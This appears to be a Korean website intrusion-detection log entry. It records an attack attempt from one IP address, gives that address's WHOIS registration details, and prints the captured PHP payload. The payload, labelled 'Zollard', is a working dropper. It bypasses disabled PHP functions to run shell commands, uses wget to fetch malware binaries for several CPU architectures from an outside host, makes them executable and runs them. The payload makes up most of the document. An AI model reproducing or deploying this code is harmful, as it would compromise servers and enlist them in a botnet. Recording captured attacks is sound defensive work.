웹사이트 침해시도 탐지코드

아이피 : 65.185.5.104

organization:Class-Name:organization

organization:ID:NETBLK-ISRR-65.185.0.0-17

organization:Auth-Area:65.185.0.0/17

organization:Org-Name:Road Runner

organization:Tech-Contact:ipaddreg@rr.com

organization:Street-Address:13820 Sunrise Valley Drive

organization:City:Herndon

organization:State:VA

organization:Postal-Code:20171

organization:Country-Code:US

organization:Phone:703-345-3151

organization:Updated:2014-03-06 10:40:50

organization:Created:2014-03-06 10:40:50

organization:Admin-Contact:IPADD-ARIN

탐지코드:

<?php

echo "Zollard";

$disablefunc = @ini_get("disable_functions");

if (!empty($disablefunc))

{

 $disablefunc = str_replace(" ","",$disablefunc);

 $disablefunc = explode(",",$disablefunc);

}

function myshellexec($cmd)

{

 global $disablefunc;

 $result = "";

 if (!empty($cmd))

 {

  if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}

  elseif (($result = `$cmd`) !== FALSE) {}

  elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}

  elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}

  elseif (is_resource($fp = popen($cmd,"r")))

  {

   $result = "";

   while(!feof($fp)) {$result .= fread($fp,1024);}

   pclose($fp);

  }

 }

 return $result;

}

myshellexec("rm -rf /tmp/armeabi;wget -P /tmp http://65.185.5.104:58455/armeabi;chmod +x /tmp/armeabi");

myshellexec("rm -rf /tmp/arm;wget -P /tmp http://65.185.5.104:58455/arm;chmod +x /tmp/arm");

myshellexec("rm -rf /tmp/ppc;wget -P /tmp http://65.185.5.104:58455/ppc;chmod +x /tmp/ppc");

myshellexec("rm -rf /tmp/mips;wget -P /tmp http://65.185.5.104:58455/mips;chmod +x /tmp/mips");

myshellexec("rm -rf /tmp/mipsel;wget -P /tmp http://65.185.5.104:58455/mipsel;chmod +x /tmp/mipsel");

myshellexec("rm -rf /tmp/x86;wget -P /tmp http://65.185.5.104:58455/x86;chmod +x /tmp/x86");

myshellexec("rm -rf /tmp/nodes;wget -P /tmp http://65.185.5.104:58455/nodes;chmod +x /tmp/nodes");

myshellexec("rm -rf /tmp/sig;wget -P /tmp http://65.185.5.104:58455/sig;chmod +x /tmp/sig");

myshellexec("/tmp/armeabi;/tmp/arm;/tmp/ppc;/tmp/mips;/tmp/mipsel;/tmp/x86;");

?>